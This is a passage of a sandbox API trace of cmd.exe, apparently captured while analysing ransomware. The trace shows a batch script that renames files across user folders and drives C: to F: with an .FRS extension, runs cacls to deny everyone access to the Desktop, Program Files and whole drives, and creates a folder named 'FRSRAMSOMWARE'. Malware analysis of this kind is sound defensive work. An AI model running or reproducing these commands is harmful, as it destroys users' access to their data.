nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.159] SetFilePointer (in: hFile=0x158, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0094.159] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0094.159] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0094.159] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.159] GetFileType (hFile=0x158) returned 0x1 [0094.159] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0094.159] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.159] SetFilePointer (in: hFile=0x158, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0094.159] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0094.159] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0094.159] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.159] GetFileType (hFile=0x158) returned 0x1 [0094.159] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0094.159] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.159] SetFilePointer (in: hFile=0x158, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0094.159] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0094.159] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0094.159] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.159] GetFileType (hFile=0x158) returned 0x1 [0094.159] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0094.159] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.160] SetFilePointer (in: hFile=0x158, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0094.160] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0094.160] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0094.160] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.160] GetFileType (hFile=0x158) returned 0x1 [0094.160] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0094.160] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.160] SetFilePointer (in: hFile=0x158, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0094.160] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0094.160] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0094.160] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.160] GetFileType (hFile=0x158) returned 0x1 [0094.160] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0094.160] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.160] SetFilePointer (in: hFile=0x158, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0094.160] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0094.160] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0094.160] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.160] GetFileType (hFile=0x158) returned 0x1 [0094.160] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0094.160] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.160] SetFilePointer (in: hFile=0x158, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0094.160] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0094.160] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0094.160] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.160] GetFileType (hFile=0x158) returned 0x1 [0094.160] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0094.160] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.160] SetFilePointer (in: hFile=0x158, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0094.160] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0094.161] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0094.161] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.161] GetFileType (hFile=0x158) returned 0x1 [0094.161] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0094.161] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.161] SetFilePointer (in: hFile=0x158, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0094.161] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0094.161] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0094.161] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.161] GetFileType (hFile=0x158) returned 0x1 [0094.161] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0094.161] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.161] SetFilePointer (in: hFile=0x158, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0094.161] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0094.161] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0094.161] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.161] GetFileType (hFile=0x158) returned 0x1 [0094.161] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0094.161] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.161] SetFilePointer (in: hFile=0x158, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0094.161] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0094.161] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0094.161] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.161] GetFileType (hFile=0x158) returned 0x1 [0094.161] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0094.161] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.161] SetFilePointer (in: hFile=0x158, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0094.161] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0094.161] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0094.161] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.161] GetFileType (hFile=0x158) returned 0x1 [0094.161] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0094.162] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.162] SetFilePointer (in: hFile=0x158, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0094.162] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0094.162] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0094.162] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.162] GetFileType (hFile=0x158) returned 0x1 [0094.162] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0094.162] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.162] SetFilePointer (in: hFile=0x158, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0094.162] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0094.162] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0094.162] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.162] GetFileType (hFile=0x158) returned 0x1 [0094.162] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0094.162] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.162] SetFilePointer (in: hFile=0x158, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0094.162] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0094.162] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0094.162] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.162] GetFileType (hFile=0x158) returned 0x1 [0094.162] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0094.162] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.162] SetFilePointer (in: hFile=0x158, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0094.162] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0094.162] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0094.162] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.162] GetFileType (hFile=0x158) returned 0x1 [0094.162] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0094.162] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.162] SetFilePointer (in: hFile=0x158, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0094.163] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0094.163] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0094.163] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.163] GetFileType (hFile=0x158) returned 0x1 [0094.163] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0094.163] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.163] SetFilePointer (in: hFile=0x158, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0094.163] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0094.163] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0094.163] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.163] GetFileType (hFile=0x158) returned 0x1 [0094.163] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0094.163] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.163] SetFilePointer (in: hFile=0x158, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0094.163] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0094.163] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0094.163] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.163] GetFileType (hFile=0x158) returned 0x1 [0094.163] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0094.163] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.163] SetFilePointer (in: hFile=0x158, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0094.163] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0094.163] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0094.163] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.163] GetFileType (hFile=0x158) returned 0x1 [0094.163] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0094.163] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.163] SetFilePointer (in: hFile=0x158, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0094.163] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0094.163] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0094.163] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.163] GetFileType (hFile=0x158) returned 0x1 [0094.164] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0094.164] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.164] SetFilePointer (in: hFile=0x158, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0094.164] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0094.164] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0094.164] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.164] GetFileType (hFile=0x158) returned 0x1 [0094.164] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0094.164] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.164] SetFilePointer (in: hFile=0x158, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0094.164] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0094.164] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0094.164] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.164] GetFileType (hFile=0x158) returned 0x1 [0094.164] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0094.164] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.164] SetFilePointer (in: hFile=0x158, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0094.164] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d 